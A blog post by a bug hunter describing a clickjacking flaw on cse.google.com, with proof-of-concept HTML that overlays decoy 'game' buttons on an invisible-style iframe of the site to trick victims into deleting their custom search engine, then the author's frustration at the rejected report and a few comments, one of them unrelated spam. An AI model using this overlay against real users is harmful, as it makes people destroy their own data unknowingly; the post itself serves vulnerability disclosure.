While i was testing i found that cse.google.com is vulnerable to clickjacking so i checked if the settings page is vulnerable or not and it was vulnerable so now this has a risk! The attacker could delete someone's CSE.
Summary: Attacker can delete victim's CSE.
Steps to reproduce:
- Go to https://cse.google.com/
- It can be embedded into any webpage.
- Attacker may manipulate HTML template so it can delete victim's CSE.
I wrote an exploit code for clickjacking and here is the exploit code:
<center>
<div style="position: absolute; left: 100px; top: 10px;"><h3>Let's consider this is a game!</h3></div>
<div style="position: absolute; left: 100px; top: 40px;"><h3>To finish it, you have to press the keys in sequence.</h3></div>
<div style="position: absolute; left: 205px; top: 278px; color: red;"><button>1</button></div>
<div style="position: absolute; left: 300px; top: 178px; color: red;"><button>2</button></div>
<div style="position: absolute; left: 400px; top: 475px; color: red;"><button>3</button></div>
<iframe style="opacity: 1; border: 0; position: fixed; top: 0px; left: 0px;" src="https://cse.google.com/" width="100%" height="100%"></iframe>
By using Clickjacking technique, an attacker can make someone unconsciously delete their CSE.
About how attacker can make someone unconsciously delete their CSE, you can check my video PoC here:
Enough about the explanation.
Okay, the problem has just begun. My findings above, in my opinion are valid bugs. Why? Because the attacker can delete someone's data (CSE), isn't this a bug? But the response I got was very surprising.
The part that makes me confused is, how is this not a bug? Because in my head it is clear that I can delete other people's data.
What do you think? Is this a bug? Or is it just me who overestimates this as a bug?
Top comments (3)
I honestly don’t get “Why is this an issue and not just annoying?”. Anything that’s annoying is an issue, no matter what. Whoever you’re talking to probably doesn’t want to bother fixing it. He even marked it as intended behavior.
Heck, one could set up a script to repeatedly do this to a site, so they wouldn’t be able to use Google CSE. If that happened to a few sites, I bet he would be quick to get something done about it.
That was the first time I reported a bug to Google. After getting a response like that I somehow got down. Crap.
Hi, Thank you for sharing. It will be helpful for engineering students to develop their own academic projects. I have found interesting projects in this deep learning final year projects.